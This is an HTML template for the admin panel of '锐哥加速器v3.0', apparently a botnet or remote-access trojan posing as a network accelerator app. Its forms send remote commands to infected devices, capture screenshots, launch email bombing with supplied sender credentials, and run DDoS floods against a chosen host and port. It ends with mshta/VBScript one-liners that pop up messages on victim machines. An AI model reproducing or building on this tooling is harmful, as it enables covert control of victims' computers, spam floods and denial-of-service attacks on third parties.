<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>锐哥加速器v3.0管理后台</title>
    <meta name="viewport" content="width=device-width" initial-scale="1"/>
</head>
<body style="margin: 20px;">
    <h1>锐哥加速器v3.0管理后台</h1>
    <p>当前在线设备数：{{ users|length }}</p>
    <form action="/action" method="post">
        <input name="command" placeholder="需要发送的远程命令"/>
        <input type="submit" />
    </form>
    <br />
    <form action="/screenshot" method="post">
        <input type="submit" value="截图" />
    </form>
    <br />
    <form action="/mail-attack" method="post">
        <input name="times" placeholder="次数" required />
        <input name="from-address" placeholder="发送者地址" required />
        <input name="from-password" placeholder="发送者密码" required />
        <input name="to-address" placeholder="收件人地址" required />
        <input name="from-name" placeholder="发件姓名" />
        <input name="title" placeholder="邮件标题" />
        <input name="content" placeholder="邮件内容" />
        <input type="submit" />
    </form>
    <br />
    <form action="/ddos" method="post">
        <input name="times" placeholder="次数" value="8080" required />
        <input name="host" placeholder="地址" required />
        <input name="page" placeholder="路径" value="/" required />
        <input name="port" placeholder="端口" value="80" required />
        <input type="submit" />
    </form>
    <br />
    <br />

    <hr />

    <br />
    <br />
    <h4>命令提示</h4>
    <p>mshta vbscript:msgbox("我是提示内容",64,"我是提示标题")(window.close)</p>
    <p>echo msgbox "我是提示内容",64,"我是提示标题">alert.vbs && start alert.vbs && ping -n 2 127.1>nul && del alert.vbs</p>

</body>
</html>
